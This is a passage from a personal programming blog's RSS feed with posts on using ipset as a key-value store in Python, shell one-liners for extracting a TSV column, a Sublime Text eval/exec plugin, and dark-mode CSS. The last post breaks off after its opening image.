            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[ipset]]></category>
                    <category><![CDATA[Python]]></category>
                    
            <guid isPermaLink="false">030de4b2cefc79293d2bc10b756e622e</guid>
            <description>Sometimes you can find a key-value store in the most unexpected places</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/electrical.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>One night laying on my back watching the ceiling sleeplessly, I had strange thoughts. Using <code>ipset</code>, we can store IP addresses (and some other things) which can later be used to simplify our <code>iptables</code> rules.</p>
<p>But what is an IP address, if not 4 bytes of random data? At least for IPv4. So, in theory, we could take a longer text, convert it to IP addresses and store it in <code>ipset</code>, making it a generic key-value store.</p>
<p>What real-world application would this have? Most probably nothing, but the idea sounded interesting enough to investigate some more. Maybe I can learn a thing or two from it.</p>
<h3>Text to IP address</h3>
<p>Let's start at the beginning. We have some good-looking text, and we want to transform it into IPv4 addresses.</p>
<pre><code>'notebook'
</code></pre>
<p>First, we need to split it into 4-byte chunks because that's what we can store in an IP address.</p>
<pre><code>['note', 'book']
</code></pre>
<p>Then we convert every character into a number.</p>
<pre><code>[[110, 111, 116, 101], [98, 111, 111, 107]]
</code></pre>
<p>And at last, we join them together with dots to get the IP addresses.</p>
<pre><code>['110.111.116.101', '98.111.111.107']
</code></pre>
<p>Funny little fact: the <code>note</code> belongs to a Chinese telecommunications company, and the <code>book</code> belongs to Verizon.</p>
<p>If the length of the text cannot be divided by four (Who would be such evil to write text like that?), then we fill the missing bits with zeros that we have to cut off when we convert the addresses back to text.</p>
<pre><code>'pencil'
    =&gt; [112, 101, 110, 99, 105, 108]
        =&gt; ['112.101.110.99', '105.108.0.0']
</code></pre>
<h3>Storing the IP addresses</h3>
<p>Naturally, we will use ipset for that, but we can already suspect that we will have some complications by looking at the name. It's a set, so an IP address can be in it only once (we cannot store the <code>gomugomu</code> text), and the order of the members isn't guaranteed (perhaps we get back <code>booknote</code> instead of <code>notebook</code>).</p>
<p>By default, we can store 65536 IP addresses in an <code>ipset</code>, so we could use the first two bytes of an address (that's exactly 65536 different values) as a serial number, and the other two bytes will be the data. It solves both problems of sequence and uniqueness, but we halve the available storage.</p>
<p>Lucky for us <code>ipset</code> can store other things, not just IP addresses. For example, IP address and port pairs. And there are 65536 different ports. What a pleasant surprise. So, we can use the port as a serial number, and the address will be just for the data.</p>
<p>In practice, this is how it would look like to store the <code>notebook</code> value under the <code>drawer</code> key:</p>
<pre class="console"><code># ipset create drawer hash:ip,port
# ipset add drawer 110.111.116.101,0
# ipset add drawer 98.111.111.107,1
# ipset list drawer
Name: drawer
Type: hash:ip,port
Revision: 5
Header: family inet hashsize 1024 maxelem 65536
Size in memory: 216
References: 0
Number of entries: 2
Members:
98.111.111.107,tcp:1
110.111.116.101,tcp:0
</code></pre>
<h3>Let's see some code</h3>
<p>Converting back and forth won't be a big surprise. We already discussed the method earlier.</p>
<pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">text_to_ip</span><span class="hljs-params">(text: str)</span> -&gt; List[str]:</span>
    parts = [str(c) <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> text.encode()]
    remainder = len(parts) % <span class="hljs-number">4</span>
    <span class="hljs-keyword">if</span> remainder &gt; <span class="hljs-number">0</span>:
        parts += [<span class="hljs-string">'0'</span>] * (<span class="hljs-number">4</span> - remainder)

    addresses = []
    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">0</span>, len(parts), <span class="hljs-number">4</span>):
        addresses.append(<span class="hljs-string">'.'</span>.join(parts[i:i + <span class="hljs-number">4</span>]))

    <span class="hljs-keyword">return</span> addresses
</code></pre>
<p>We convert the text into bytes and convert the individual bytes back to strings, so later, the <code>join</code> will work. Next, fill the missing bytes with zeros so the resulting length will be divisible by four, and at last, we make each group of fours into an IP address.</p>
<pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">ip_to_text</span><span class="hljs-params">(addresses: List[str])</span> -&gt; str:</span>
    text = []
    <span class="hljs-keyword">for</span> addr <span class="hljs-keyword">in</span> addresses:
        text += [chr(int(c)) <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> addr.split(<span class="hljs-string">'.'</span>)]

    <span class="hljs-keyword">return</span> <span class="hljs-string">''</span>.join(text).strip(<span class="hljs-string">'\x00'</span>)
</code></pre>
<p>Converting it back to text is even easier. We just convert all parts of the IP address back to the corresponding character, join it back together into one long string, and cut off the zeroes from the end.</p>
<p>Storing the addresses could be a bit challenging. Of course, we could use the <code>subprocess</code> module to call the <code>ipset</code> command hundreds of times to save a single value, but it does not feel that elegant, let alone efficient.</p>
<p>We could use <a href="https://ipset.netfilter.org/libipset.man.html">libipset</a> shipped with <code>ipset</code> and the <code>ctypes</code> module of Python. It's a bit more complicated, but it's also ten times faster than using <code>subprocess</code> in this case.</p>
<p>First, we will need something to talk to the <code>libipset</code> library.</p>
<pre><code class="hljs python"><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> cdll, c_int, POINTER, c_char_p, CFUNCTYPE, c_void_p


<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">IpSet</span>:</span>
    __output = <span class="hljs-string">b''</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self)</span>:</span>
        self.__library = cdll.LoadLibrary(<span class="hljs-string">'libipset.so.13'</span>)
        self.__library.ipset_load_types()
        self.__library.ipset_init.restype = POINTER(c_int)
        self.__ipset = self.__library.ipset_init()
        self.__library.ipset_custom_printf(
            self.__ipset,
            <span class="hljs-literal">None</span>, <span class="hljs-literal">None</span>, self.__ipset_print_outfn,
            <span class="hljs-literal">None</span>
        )

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__del__</span><span class="hljs-params">(self)</span>:</span>
        self.__library.ipset_fini(self.__ipset)

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span><span class="hljs-params">(self, command: List[str])</span>:</span>
        IpSet.__output = <span class="hljs-string">b''</span>
        command = [<span class="hljs-string">'ipset'</span>] + command

        self.__library.ipset_parse_argv(
            self.__ipset,
            len(command),
            (c_char_p * len(command))(*[
                c_char_p(arg.encode()) <span class="hljs-keyword">for</span> arg <span class="hljs-keyword">in</span> command
            ])
        )

        <span class="hljs-keyword">return</span> IpSet.__output

<span class="hljs-meta">    @staticmethod</span>
<span class="hljs-meta">    @CFUNCTYPE(c_int, POINTER(c_int), c_void_p, c_char_p, c_char_p)</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__ipset_print_outfn</span><span class="hljs-params">(session, p, fmt, outbuf)</span>:</span>
        IpSet.__output += outbuf
        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>
</code></pre>
<p>We need to load the library and call some functions on it, so it's appropriately initialized, and of course, we need to juggle with C types here, so there is &quot;a bit&quot; of extra code because of that, but at the end, we successfully run the command.</p>
<p>It wasn't an easy ride to come up with that class, it took a considerable amount of time, and I had to go through the <a href="https://docs.python.org/3/library/ctypes.html">documentation of ctypes</a>, the relevant part of the <a href="https://git.netfilter.org/ipset/tree/">source code of ipset</a>, and of course, Google also helped a lot. In the end, I managed to glue together all the pieces without getting segmentation faults constantly. It works, but (considering my slight incompetence in this area) it might not be the perfect solution.</p>
<p>From this point, it's a smooth ride to write the client to our new key-value store.</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> re


<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">IpSetKeyValueStore</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, ipset: IpSet)</span>:</span>
        self.__ipset = ipset
        self.__ip_pattern = re.compile(<span class="hljs-string">r'(\d+\.\d+\.\d+\.\d+),.*:(\d+)'</span>)

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__del__</span><span class="hljs-params">(self)</span>:</span>
        <span class="hljs-keyword">del</span> self.__ipset

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get</span><span class="hljs-params">(self, key: str)</span> -&gt; str:</span>
        result = self.__ipset.run([<span class="hljs-string">'list'</span>, <span class="hljs-string">'-output'</span>, <span class="hljs-string">'save'</span>, key])
        data = self.__ip_pattern.findall(result.decode(<span class="hljs-string">'utf-8'</span>))

        addresses = [ip <span class="hljs-keyword">for</span> ip, _ <span class="hljs-keyword">in</span> sorted(data, key=<span class="hljs-keyword">lambda</span> x: int(x[<span class="hljs-number">1</span>]))]
        <span class="hljs-keyword">return</span> ip_to_text(addresses)

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">set</span><span class="hljs-params">(self, key: str, value: str)</span> -&gt; <span class="hljs-keyword">None</span>:</span>
        self.__ipset.run([<span class="hljs-string">'create'</span>, <span class="hljs-string">'-exist'</span>, key, <span class="hljs-string">'hash:ip,port'</span>])
        self.__ipset.run([<span class="hljs-string">'flush'</span>, key])

        i = <span class="hljs-number">0</span>
        <span class="hljs-keyword">for</span> ip <span class="hljs-keyword">in</span> text_to_ip(value):
            self.__ipset.run([<span class="hljs-string">'add'</span>, key, <span class="hljs-string">f'<span class="hljs-subst">{ip}</span>,<span class="hljs-subst">{i}</span>'</span>])
            i += <span class="hljs-number">1</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">delete</span><span class="hljs-params">(self, key: str)</span> -&gt; <span class="hljs-keyword">None</span>:</span>
        self.__ipset.run([<span class="hljs-string">'destroy'</span>, key])
</code></pre>
<p>There are many ways to improve and extend this further. For example, <code>ipset</code> supports timeouts, so expiring keys can be easily added, or the storage capacity can be significantly increased using IPv6 addresses. I leave these as an exercise for the reader.</p>
<p>It is also worth mentioning that we could add a comment when we store an IP address, making it so much easier to store any data in the ipset. But where's the fun in that?</p>

]]></content:encoded>
        </item>
            <item>
            <title>Variations for a theme</title>
            <link>https://deadlime.hu/en/2022/02/17/variations-for-a-theme/</link>
            <pubDate>Thu, 17 Feb 2022 07:38:10 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[AWK]]></category>
                    <category><![CDATA[command line]]></category>
                    <category><![CDATA[sed]]></category>
                    
            <guid isPermaLink="false">04daa91e33bacc8ea5f33ade53e994a9</guid>
            <description>The Linux shell is a swiss army knife made out of swiss army knives</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/cake_pops.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Sometimes you start to follow a thought and end up in unexpected places. When you find out not only that how deep is the rabbit hole, but you even start to dig extra tunnels.</p>
<p>A similar thing happened to me when I faced with the following problem: you have a file containing values separated with tab characters. The first row is the name of the columns. Something like this:</p>
<pre><code>id  name  status  date  type
1 n1  s1  d1  t1
2 n2  s2  d2  t2
3 n3  s3  d3  t3
</code></pre>
<p>You need to get the values from the first column separated by spaces. For this example, this would be the result: <code>1 2 3</code>. To ramp up the difficulty, we want to solve this in the command line and don't want to write a script. It had already had a solution also:</p>
<pre class="console"><code>cat file.tsv | awk '(NR&gt;1) { print $1 }'  |  tr '\n'  ' '
</code></pre>
<p>Although I'm also a big awk fan myself, this wasn't the first solution that came to my mind. But there is nothing wrong with that. In fact, this started me on the journey to find more alternative solutions.</p>
<h3>Dissecting the problem</h3>
<p>First, we should examine the task a little bit more. It can be divided into three parts:</p>
<ol>
<li>get rid of the first row</li>
<li>get the first column from every row</li>
<li>transform the rows into a single row (where the values are separated with spaces)</li>
</ol>
<p>Now that we have a couple of smaller tasks, we can look for solutions for each one of them separately.</p>
<h3>Getting rid of the first row</h3>
<pre class="console"><code>awk '(NR&gt;1) { print }'
</code></pre>
<p>A bit forced example based on the original solution. If we went this far with <code>awk</code>, we could go even farther, but we will jump back to this a little later.</p>
<pre class="console"><code>sed 1d
</code></pre>
<p>This one I found while digging looks like a pretty elegant solution. It deletes the first line and returns everything back without change.</p>
<pre class="console"><code>tail +2
</code></pre>
<p>The more well-known <code>tail -1</code> command returns the input from the last row until the end. This one returns from the second row until the end.</p>
<h3>Keeping only the first column</h3>
<pre class="console"><code>awk '{ print $1 }'
</code></pre>
<p>A classic <code>awk</code> solution. Not much to say about it.</p>
<pre class="console"><code>cut -f1
</code></pre>
<p>My personal favorite. It's a bit dumber than <code>awk</code> (for example, handling multiple separator characters next to each other wouldn't work that well), but it's still useful in many cases.</p>
<pre class="console"><code>sed 's/^\([^\t]\+\).*/\1/'
</code></pre>
<p>You can solve anything with <code>sed</code>. But why would you do that? It's a huge help that we need the first column. It could also help if we know that the <code>id</code> is numeric only.</p>
<h3>Making one single row</h3>
<pre class="console"><code>paste -s -d' ' -
</code></pre>
<p>The right tool for this job. It's an excellent choice.</p>
<pre class="console"><code>sed -n 'H;${g;y/\n/ /;p}'
</code></pre>
<p>Not as friendly as the previous one, and it generates an extra space character at the start of the line. We will go into much more detail later about what this line really means.</p>
<pre class="console"><code>tr '\n'  ' '
</code></pre>
<p>This works nicely. The only drawback is that it replaces the last newline, so we end up with an extra space at the end of the line.</p>
<pre class="console"><code>xargs
</code></pre>
<p>It's an odd choice. The <code>xargs</code> command creates parameters from rows and passes them to another one. The default command happens to be <code>echo</code>, so it does exactly what we want. However, it does not work if we need to separate the values with anything other than spaces.</p>
<h3>Complex solutions</h3>
<p>We already have 36 different solutions, but you wouldn't write something like <code>awk '(NR&gt;1) { print }' | awk '{ print $1 }'</code>. Sometimes a tool can solve multiple subtasks at once:</p>
<pre class="console"><code>awk '(NR&gt;1) { print $1 }'
</code></pre>
<pre class="console"><code>sed -n '1!s/^\([^ ]\+\).*\n/\1/p'
</code></pre>
<pre class="console"><code>perl -F'\t' -e 'print &quot;$F[0] &quot; if $i &gt; 0; $i++'
</code></pre>
<p>Can we find a tool that can solve the whole problem? There should be a simple <code>sed</code> command that does what we want, right? Digging just got real. I jumped deep down to the <a href="https://www.gnu.org/software/sed/manual/sed.html"><code>sed</code> documentation</a> for answers. I was horrified by the things this tool can make. Like it was a love child of <code>awk</code> and <code>vi</code>. But my efforts weren't in vain. At long last, I emerged from the depth with a command:</p>
<pre class="console"><code>sed -n '1!{s/^\([^\t]\+\).*/\1/;H};${g;y/\n/ /;s/^ //;p}'
</code></pre>
<p>It's trivial, right? It should have been the first thing I thought of. I don't want to drag anyone down to the abyss we know as <code>sed</code>, but this command could use some explanation.</p>
<h3><code>sed</code> basics</h3>
<p><code>sed</code> uses commands. Every command has a <code>&lt;filter&gt;&lt;command&gt;&lt;parameter&gt;</code> format. It runs on every row of the input where the filter is true (it feels a lot like <code>awk</code> in this regard). We can give more than one command if we separate them with a semicolon. Multiple commands can belong to a filter also if we put them between <code>{</code> and <code>}</code>.</p>
<p>One more thing worth mentioning is &quot;pattern space&quot;. Initially, it contains the current row, and the commands can write back their output into it. Also, there is something called a &quot;hold space&quot;. We could save the &quot;pattern space&quot; content into the &quot;hold space&quot; and later load it back.</p>
<h3>The details of the solution</h3>
<p>Nothing left to do than dissect the original command:</p>
<pre class="console"><code>sed -n '1!{s/^\([^\t]\+\).*/\1/;H};${g;y/\n/ /;s/^ //;p}'
</code></pre>
<p>The <code>-n</code> flag tells <code>sed</code> to not produce any output by default. The part after that can be split into two commands. We have a <code>1!{...}</code> and a <code>${...}</code> filter block. The first one runs on every row except the first row, and the second one only runs on the last row.</p>
<p>The first filter block runs two commands, an <code>s</code>, and an <code>H</code>. The <code>s</code> replaces the whole row with the value of the first column, and the <code>H</code> command adds the current content to the hold space separated by a new line.</p>
<p>The second filter block runs four commands. A <code>g</code>, a <code>y</code>, an <code>s</code>, and at last a <code>p</code>. The <code>g</code> gets the content of the hold space (values from the first column separated with newlines), the <code>y</code> replaces the newlines with whitespaces, next the <code>s</code> removes the extra space from the start of the value, the <code>p</code> prints the result and we are finally done.</p>
<p>Interestingly enough, if we try to use another tool (like <code>awk</code> or a Perl one-liner), we get more or less the same result. Maybe because these tools are working with rows so we need something where we can hold the partial result.</p>
<p>This marks the end of our little journey into <code>sed</code>-land. Lessons learned? Using proper tools to solve subtasks is more effective than solving the whole problem with one generic tool. Have a nice text processing.</p>

]]></content:encoded>
        </item>
            <item>
            <title>This could also work</title>
            <link>https://deadlime.hu/en/2021/10/16/this-could-also-work/</link>
            <pubDate>Fri, 15 Oct 2021 22:25:38 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Python]]></category>
                    <category><![CDATA[Sublime]]></category>
                    
            <guid isPermaLink="false">8d017928ef1836a99c58b5c0c113dda5</guid>
            <description>Sometimes the eval is not that evil</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/archive.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Sublime is the text editor that is almost always running on my machine. A long time ago, it was the only editor I wrote code in. Nowadays, it's mostly some <code>untitled</code> files with messy notes, code snippets, half-written messages, or anything text-related.</p>
<p>I like to use it to transform text. For example, if I have a couple of lines and want to put every line between quotes or sort some lines alphabetically and concatenate the rows into one single comma-separated string, things like that. I even tend to copy text from my actual IDE, paste it into Sublime, transform it, and copy it back.</p>
<p>Of course, you could say that <a href="https://www.vim.org/">Vim</a> (or <a href="https://www.gnu.org/software/emacs/">Emacs</a>) can do such things faster and more efficiently and be capable of many other things. But for me, the mouse-driven multi-cursor workflow fits better than Vim-magic. I know, I'm a weirdo.</p>
<p>Sometimes I run into problems that cannot be easily solved by Sublime. Situations where a quiet voice in the back of your head tells you that you should write a small script or at least open the REPL of your favorite scripting language.</p>
<p><a id="cite_ref-1"></a>Let's look at a simple example. You want to generate the list of numbers from 1 to 10, every number in its own line. Of course, the local Vim-magician would tell you that it's just a quick <kbd>i</kbd> <kbd>1</kbd> <kbd>Esc</kbd> <kbd>q</kbd> <kbd>a</kbd> <kbd>Y</kbd> <kbd>p</kbd> <kbd>Ctrl</kbd>+<kbd>a</kbd> <kbd>q</kbd> <kbd>8</kbd> <kbd>@</kbd> <kbd>a</kbd> and you are done, but for me, this does not look like something that would come up in a real-world scenario.<a href="#cite_note-1" class="note"><sup>[1]</sup></a></p>
<p><a id="cite_ref-2"></a>Luckily Sublime supports plugins, and even more lucky that they choose a proper scripting language for it. There is nothing worse than when you like a program, you want to create plugins for it, and it turns out that you must use Perl.<a href="#cite_note-2" class="note"><sup>[2]</sup></a></p>
<h3>Running the selection</h3>
<p><a id="cite_ref-3"></a>My first idea was that I could create a command that runs the selected text as Python code and replaces it with the result:<a href="#cite_note-3" class="note"><sup>[3]</sup></a></p>
<pre class="file"><code>eval.py
</code></pre>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> sublime_plugin

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">EvalSelectionsCommand</span><span class="hljs-params">(sublime_plugin.TextCommand)</span>:</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span><span class="hljs-params">(self, edit)</span>:</span>
    <span class="hljs-keyword">for</span> region <span class="hljs-keyword">in</span> self.view.sel():
      <span class="hljs-keyword">if</span> region.empty():
        <span class="hljs-keyword">continue</span>

      code = self.view.substr(region)
      result = str(eval(code))
      self.view.replace(edit, region, result)
</code></pre>
<p>Interestingly enough, this was the first time I had to use <code>eval()</code> in Python. Soon enough, I also learned that we were all of us deceived, for another <code>eval()</code> was made... called <code>exec()</code>. Yes, my Precious, the first one just evaluates expressions. Only the second one can be used to execute any kind of Python code. Sneaky little hobbitses. But let's not go that far ahead. First, we need to somehow run this command.</p>
<pre class="file"><code>eval.sublime-command
</code></pre>
<pre><code class="hljs json">[
  { <span class="hljs-attr">"caption"</span>: <span class="hljs-string">"Run selection"</span>, <span class="hljs-attr">"command"</span>: <span class="hljs-string">"eval_selections"</span> }
]
</code></pre>
<p>Now we can select, for example, the <code>'\n'.join(map(str, range(1, 11)))</code> text, hit a <kbd>Ctrl</kbd>+<kbd>Shift</kbd>+<kbd>p</kbd>, search for the command and we are done. Somehow, it felt less comfortable than I had hoped for, but it could be capable of many things compared to the simplicity of the code.</p>
<h3>Transforming the selection</h3>
<p>Now, let's look at a different approach. What if the selection does not contain the code, but the code is working on the selections?</p>
<pre class="file"><code>eval.py
</code></pre>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> sublime_plugin

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">EvalSelectionsCommand</span><span class="hljs-params">(sublime_plugin.TextCommand)</span>:</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span><span class="hljs-params">(self, edit, text)</span>:</span>
    <span class="hljs-keyword">for</span> idx, region <span class="hljs-keyword">in</span> enumerate(self.view.sel()):
      data = self.view.substr(region)
      result = str(eval(text, {<span class="hljs-string">'d'</span>: data, <span class="hljs-string">'i'</span>: idx}, {}))
      self.view.replace(edit, region, result)

  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">input</span><span class="hljs-params">(self, args)</span>:</span>
    <span class="hljs-keyword">return</span> sublime_plugin.TextInputHandler()
</code></pre>
<p>The <code>eval()</code> got a little bit more complex. We pass a couple of variables we can use later in our expression. This way, we could have ten empty rows, an empty selection in every row, run the command and write <code>i+1</code> as the expression. Or, if the selections are not empty, we could write <code>f'{i+1}. {d}'</code> to prefix them with numbers.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/transform-selection.png" width="660" height="300" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">A later iteration of this idea. The <code>d</code> variable name was changed to <code>_</code>, with a preview based on the first selection.</p>

<h3>More clever execution</h3>
<p>We can now jump back to the <code>exec()</code>. If we have the following small code snippet selected and try to run it...</p>
<pre><code class="hljs python"><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">10</span>):
  print(i+<span class="hljs-number">1</span>)
</code></pre>
<p>...our first implementation would throw a <code>SyntaxError: invalid syntax</code> exception. So we need to make it a little smarter:</p>
<pre class="file"><code>eval.py
</code></pre>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> sublime_plugin
<span class="hljs-keyword">import</span> traceback

<span class="hljs-keyword">from</span> io <span class="hljs-keyword">import</span> StringIO
<span class="hljs-keyword">from</span> contextlib <span class="hljs-keyword">import</span> redirect_stdout

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">EvalSelectionsCommand</span><span class="hljs-params">(sublime_plugin.TextCommand)</span>:</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span><span class="hljs-params">(self, edit)</span>:</span>
    <span class="hljs-keyword">for</span> region <span class="hljs-keyword">in</span> self.view.sel():
      <span class="hljs-keyword">if</span> region.empty():
        <span class="hljs-keyword">continue</span>

      code = self.view.substr(region)
      self.view.replace(edit, region, self.__run_code(code))

  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__run_code</span><span class="hljs-params">(self, code)</span>:</span>
    <span class="hljs-keyword">try</span>:
      <span class="hljs-keyword">return</span> str(eval(code))
    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:
      <span class="hljs-keyword">try</span>:
        <span class="hljs-keyword">return</span> self.__exec_code(code)
      <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:
        <span class="hljs-keyword">return</span> <span class="hljs-string">''</span>.join(traceback.format_exception(type(e), e, e.__traceback__))

  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__exec_code</span><span class="hljs-params">(self, code)</span>:</span>
    f = StringIO()
    <span class="hljs-keyword">with</span> redirect_stdout(f):
      exec(code)
    <span class="hljs-keyword">return</span> f.getvalue()
</code></pre>
<p>We will try to run it first with <code>eval()</code>, and if that fails, we use <code>exec()</code>. It's a little tricky. If we didn't redirect the standard output, it would end up in the console of Sublime, and we wouldn't get the desired result.</p>
<p>As an added bonus, we also have better error handling in this one, so we don't have to check the console if something is wrong with the code we want to run. The code will be replaced with the error, but we can quickly get it back with <kbd>Ctrl</kbd>+<kbd>z</kbd>, of course.</p>
<h3>A wealth of possibilities</h3>
<p>There are many ways we could improve this little plugin-wannabe. Just a couple of ideas:</p>
<ul>
<li>the two mentioned approaches could be two different commands, different tools for different problems</li>
<li>we can add aliases, shortcuts, and helper functions for often used functionalities to <code>eval()</code> or <code>exec</code> so we can use them in our code snippet</li>
<li>output could be displayed in a separate window</li>
</ul>
<p>But our broadcast time is coming to its end, so I have no other choice than leave the further investigation of the topic as an exercise for the reader.</p>
<hr />
<h3>Notes</h3>
<p><a id="cite_note-1"></a>1. <a href="#cite_ref-1" class="note">↑</a> There are more straightforward, shorter solutions, but this one felt the most Vim-like for me. More details <a href="https://vi.stackexchange.com/questions/12/how-can-i-generate-a-list-of-sequential-numbers-one-per-line">here</a>.</p>
<p><a id="cite_note-2"></a>2. <a href="#cite_ref-2" class="note">↑</a> Just a childhood trauma. Don't really worry about it. A long-long time ago, I really liked the <a href="https://irssi.org/">Irssi IRC client</a>, but my brain couldn't handle Perl, so I wasn't able to write scripts for it.</p>
<p><a id="cite_note-3"></a>3. <a href="#cite_ref-3" class="note">↑</a> Naturally, there are <a href="https://packagecontrol.io/search/eval">existing plugins for this</a>, but where is the fun in that?</p>

]]></content:encoded>
        </item>
            <item>
            <title>Don&#039;t underestimate the power of the Dark Site</title>
            <link>https://deadlime.hu/en/2021/09/27/dont-underestimate-the-power-of-the-dark-site/</link>
            <pubDate>Sun, 26 Sep 2021 22:33:41 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[CSS]]></category>
                    <category><![CDATA[siteinfo]]></category>
                    
            <guid isPermaLink="false">9ab817c3217757615fdda553344122d3</guid>
            <description>For all the dark mode fans: the site now has dark color scheme support</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/night-sky.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>You may run into dark mode in more and more places nowadays, like in operating systems or even in browsers. This inspired me to create the dark variant of the site too.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/modes.jpg" width="660" height="300" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">The two color schemes next to each other</p>

<p>The development part was surprisingly easy. I only needed to add a media query and fill it with rules.</p>
<pre><code class="hljs css"><span class="hljs-keyword">@media</span> (<span class="hljs-attribute">prefers-color-scheme:</span> dark) {
}
</code></pre>
<p>For the sake of simplicity, I just copied the original CSS into this block, removed everything not color-related, and adjusted the values in the rest. After that, the only remaining thing to fix was the images. So I made a dark variant of the header image, and for the SVG images, I used the following trick:</p>
<pre class="file"><code>image.svg
</code></pre>
<pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">"http://www.w3.org/2000/svg"</span> <span class="hljs-attr">version</span>=<span class="hljs-string">"1.1"</span>&gt;</span>
  <span class="hljs-tag">&lt;<span class="hljs-name">style</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"text/css"</span>&gt;</span><span class="xml">&lt;![CDATA[
    .shape { display: none; }
    .shape:target { display: inline; }
  ]]&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">style</span>&gt;</span>
  <span class="hljs-tag">&lt;<span class="hljs-name">g</span> <span class="hljs-attr">class</span>=<span class="hljs-string">"shape"</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"light"</span>&gt;</span>
    <span class="hljs-comment">&lt;!-- source of the original image --&gt;</span>
  <span class="hljs-tag">&lt;/<span class="hljs-name">g</span>&gt;</span>
  <span class="hljs-tag">&lt;<span class="hljs-name">g</span> <span class="hljs-attr">class</span>=<span class="hljs-string">"shape"</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"dark"</span>&gt;</span>
    <span class="hljs-comment">&lt;!-- source of the modified dark image --&gt;</span>
  <span class="hljs-tag">&lt;/<span class="hljs-name">g</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span>
</code></pre>
<p>This can be referenced in CSS in the following way:</p>
<pre><code class="hljs css"><span class="hljs-selector-id">#something</span> {
  <span class="hljs-attribute">background-image</span>: <span class="hljs-built_in">url</span>(<span class="hljs-string">'image.svg#light'</span>);
}
<span class="hljs-keyword">@media</span> (<span class="hljs-attribute">prefers-color-scheme:</span> dark) {
  <span class="hljs-selector-id">#something</span> {
    <span class="hljs-attribute">background-image</span>: <span class="hljs-built_in">url</span>(<span class="hljs-string">'image.svg#dark'</span>);
  }
}
</code></pre>
<p>It was pretty fun, so I highly recommend it to anyone as a light evening pastime activity.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Surfing on radio waves</title>
            <link>https://deadlime.hu/en/2021/01/25/surfing-on-radio-waves/</link>
            <pubDate>Mon, 25 Jan 2021 11:00:00 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Arduino]]></category>
                    <category><![CDATA[Teensy]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">3fff7c84c652d0272c18bb3c23afd3c7</guid>
            <description>Our next journey with the doorbell takes us to the wonderful world of radio signals</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/telescope.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

